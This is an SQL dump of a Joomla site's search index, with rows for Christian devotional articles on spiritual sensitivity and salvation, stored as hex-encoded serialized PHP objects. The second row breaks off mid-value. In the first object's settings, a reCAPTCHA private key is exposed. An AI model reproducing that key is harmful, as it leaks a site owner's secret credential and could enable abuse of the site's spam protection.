INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(298, 'index.php?option=com_k2&view=item&id=10', 'index.php?option=com_k2&view=item&id=10:sensitivity', 'Ways to Increase your Sensitivity', ' Today, I want to share with you ways that you can increase your spiritual sensitivity. Stay away from un-anointed atmospheres. Create an atmosphere of the anointing by constant worship, praise, and regularly listening to messages.', '2018-04-08 10:51:44', '93d50b8a5b63b546034faa7da1d3b165', 1, 1, 1, '*', '2017-01-01 07:06:51', '0000-00-00 00:00:00', '2017-01-01 07:06:51', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223130223b733a353a22616c696173223b733a31313a2273656e7369746976697479223b733a373a2273756d6d617279223b733a3234383a223c703e546f6461792c20492077616e7420746f207368617265207769746820796f752077617973207468617420796f752063616e20696e63726561736520796f75722073706972697475616c2073656e73697469766974792e3c2f703e0d0a3c756c3e0d0a3c6c693e5374617920617761792066726f6d20756e2d616e6f696e7465642061746d6f737068657265732e2043726561746520616e2061746d6f737068657265206f662074686520616e6f696e74696e6720627920636f6e7374616e7420776f72736869702c207072616973652c20616e6420726567756c61726c79206c697374656e696e6720746f206d657373616765732e223b733a343a22626f6479223b733a313739313a223c2f6c693e0d0a3c6c693e4d61696e7461696e20636c6f736520636f6e7461637420776974682061757468656e74696320676966747320616e642063616c6c696e6773206f662074686520486f6c79205370697269742e2053746f702073746179696e672061726f756e6420737472616e67652073706972697475616c20696e666c75656e6365732c2066616c73652070726f70686574732c20616e642070656f706c652074686174206f70657261746520696e2066616c7365686f6f642e2046696e642067656e75696e65206d696e6973746572732061726f756e6420796f752c206c697374656e20746f207468656d20616e6420617474656e64207468656972206d696e69737472792ec2a03c2f6c693e0d0a3c6c693e496e63726561736520796f757220696e74616b65206f662074686520776f7264206f6620476f642e204f6e65206f6620746865207369676e73206f662073706972697475616c207369636b6e657373206973206c6f73696e6720617070657469746520666f722074686520776f7264206f6620476f642e20537475647920746865204269626c6520726567756c61726c792e205265616420746865206269626c65207468726f75676820696e206120796561722e3c2f6c693e0d0a3c6c693e496e63726561736520796f757220636f6e66657373696f6e206f662074686520776f7264206f6620476f642e20596f757220776f7264732061666665637420796f7572207370697269742e3c2f6c693e0d0a3c6c693e526567756c61722066617374696e672e2046617374696e67206973206120626f6f7374657220746f2073706972697475616c20616374697669746965732e204d616a6f72697479206f662043687269737469616e7320617265207374727567676c696e67206265636175736520746865792063616e27742067657420746f20746865206672657175656e6379207468617420476f6420697320636f6d6d756e69636174696e672077697468207468656d2e20596f752073686f756c64206e6f746520746861742066617374696e6720646f6573206e6f74206368616e676520476f642c2066617374696e67206368616e67657320796f752e2046617374696e672066696e652d74756e657320796f7572206672657175656e637920746f20746865206672657175656e6379206f662074686520486f6c79205370697269742e20496620796f75e280997265206e6f7420636f6e63656e74726174696e67206f6e20736f6d657468696e672073706972697475616c2c20796f7520617265206e6f742066617374696e6720627574206a75737420646f696e672068756e67657220737472696b652e20446f6ee2809974207573652066617374696e6720746f20627269626520476f6420746f206368616e676520486973206d696e6420636f6e6365726e696e672061206d61747465722e3c2f6c693e0d0a3c6c693e416c6c6f7720746865206672756974206f66207468652053706972697420746f2067726f7720696e20796f752ec2a03c2f6c693e0d0a3c6c693e52656475636520656d6f74696f6e616c69736d2e20446f6e2774206c657420796f757220656d6f74696f6e73206f7220616e6f7468657220706572736f6e277320656d6f74696f6e732072756c6520796f752e204e656761746976652070617373696f6e73207265647563652073706972697475616c2073656e73697469766974792e20416e6765722c2077726174682c206d616c69636520616e64206f6666656e7365732061726520616c6c20656e656d696573206f662073706972697475616c2073656e73697469766974792e3c2f6c693e0d0a3c6c693e5370656e64206d6f72652074696d6520737065616b696e6720696e20746f6e6775652e3c2f6c693e0d0a3c6c693e496e7374616e74206f62656469656e636520746f20646976696e65207369676e616c2e20446976696e65207369676e616c7320636f6d65207468726f75676820796f757220636f6e736369656e63652e3c2f6c693e0d0a3c6c693e4c6561726e20746f20726562756b652077726f6e6720737069726974732e204361737420646f776e206576657279206576696c20696d6167696e6174696f6e2c20616e7920616e797468696e67207468617420697320616761696e737420746865206b6e6f776c65646765206f6620476f642e204c6561726e20746f2077616c6b207769746820746865204c6f726420756e74696c20796f7572206865617274206973207374726f6e676572207468616e20796f757220627261696e2c20626f64792c20616e64206d656e2773206f70696e696f6e2e20596f757220626f6479206c616e677561676520696e207468652070726573656e6365206f6620476f642077696c6c207369676e616c20746865206174746974756465206f6620476f6420746f776172647320796f752e3c2f6c693e0d0a3c2f756c3e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031382d30342d30382031303a35313a3433223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2234223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a31343a2231303a73656e7369746976697479223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a33323a22636f6d706f6e656e742f6b322f6974656d2f31302d73656e7369746976697479223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3130223b733a353a22726f757465223b733a35313a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31303a73656e7369746976697479223b733a353a227469746c65223b733a33333a225761797320746f20496e63726561736520796f75722053656e7369746976697479223b733a31313a226465736372697074696f6e223b733a3233313a2220546f6461792c20492077616e7420746f207368617265207769746820796f752077617973207468617420796f752063616e20696e63726561736520796f75722073706972697475616c2073656e73697469766974792e205374617920617761792066726f6d20756e2d616e6f696e7465642061746d6f737068657265732e2043726561746520616e2061746d6f737068657265206f662074686520616e6f696e74696e6720627920636f6e7374616e7420776f72736869702c207072616973652c20616e6420726567756c61726c79206c697374656e696e6720746f206d657373616765732e223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d30312030373a30363a3531223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d30312030373a30363a3531223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(299, 'index.php?option=com_k2&view=item&id=8', 'index.php?option=com_k2&view=item&id=8:who-is-genuinely-saved', 'Who is Genuinely Saved', ' Introduction: Knowing whether one is saved is a major question everyone needs to answer on this earth and on time. This is one of the questions that no other man can answer as much as the person involved. The young and the aged, male and female, white and black, learned and illiterate etc all need to answer this singular question of life – Am I genuinely saved? ', '2018-04-08 11:52:22', 'ecf5ffa0e308caaf368b403396e1c37c', 1, 1, 1, '*', '2016-12-31 21:38:55', '0000-00-00 00:00:00', '2016-12-31 21:38:55', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a313a2238223b733a353a22616c696173223b733a32323a2277686f2d69732d67656e75696e656c792d7361766564223b733a373a2273756d6d617279223b733a3337353a223c703e496e74726f64756374696f6e3a204b6e6f77696e672077686574686572206f6e652069732073617665642069732061206d616a6f72207175657374696f6e2065766572796f6e65206e6565647320746f20616e73776572206f6e207468697320656172746820616e64206f6e2074696d652e2054686973206973206f6e65206f6620746865207175657374696f6e732074686174206e6f206f74686572206d616e2063616e20616e73776572206173206d7563682061732074686520706572736f6e20696e766f6c7665642ec2a054686520796f756e6720616e642074686520616765642c206d616c6520616e642066656d616c652c20776869746520616e6420626c61636b2c206c6561726e656420616e6420696c6c697465726174652065746320616c6c206e65656420746f20616e7377657220746869732073696e67756c6172207175657374696f6e206f66206c69666520e2809320416d20492067656e75696e656c792073617665643f3c2f703e0d0a223b733a343a22626f6479223b733a343134363a220d0a3c703ee280a62e204c6574e2809973206d616b6520737572652e3c2f703e0d0a3c703e4d7920667269656e642c20617373756d7074696f6e20697320746865206c6f7765737420666f726d206f66206b6e6f776c6564676520616e64207768656e20697420636f6d657320746f20637269746963616c207468696e6773206f66206c6966652c20796f7520646f6ee280997420776f726b206f6e20617373756d7074696f6e20627574207265616c6974792e3c2f703e0d0a3c703e4e6f20776f6d616e20617373756d657320736865e280997320707265676e616e742e2053686520676f657320666f7220746573747320616e642070726f76657320697421204e6f2073747564656e7420617373756d6573206865e2809973206265696e672061646d697474656420696e746f2068696768657220696e737469747574696f6e2c20686520676f657320746f20636f6e666972